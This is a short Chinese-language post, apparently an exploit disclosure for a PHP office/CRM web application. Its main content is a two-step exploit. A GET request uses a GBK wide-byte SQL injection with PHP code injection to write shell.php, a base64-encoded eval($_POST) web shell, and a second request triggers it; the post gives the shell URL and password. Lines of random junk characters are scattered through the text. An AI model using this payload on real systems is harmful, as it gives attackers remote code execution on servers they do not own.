此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
7 f4 p2 A( E) B9 U! d- E
( h3 Z* z6 R" I) E# G% e& q" G " S1 r5 H( O7 b2 |4 l) L
EXP:
: e7 A1 B( m8 R7 K1 k # d4 ^0 h4 R' [$ }" o& Z1 C
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
: [1 g6 H4 D& i ; N4 e. y7 V' G- S' {! }* }
第二步: [GET]http://site/general/email/index.php! m) G% w$ Q7 J; b7 y. Q, x% J/ g
+ Z6 i8 c( Z* I- M! B7 OSHELL: http://site/general/email/shell.php 密码C
( y/ j1 i9 b7 V5 G8 z
1 ^% |: s; \4 @( G5 K( h7 O' B
5 ?) E. W, K5 ]( }此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好- w" \+ w, J- X% z
: c' q( L+ m2 C5 x9 G3 R' w& E有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
9 n" W8 ?8 g g( y: O5 |4 J% M2 E, f7 T
2 K- q; T' @/ l: l
|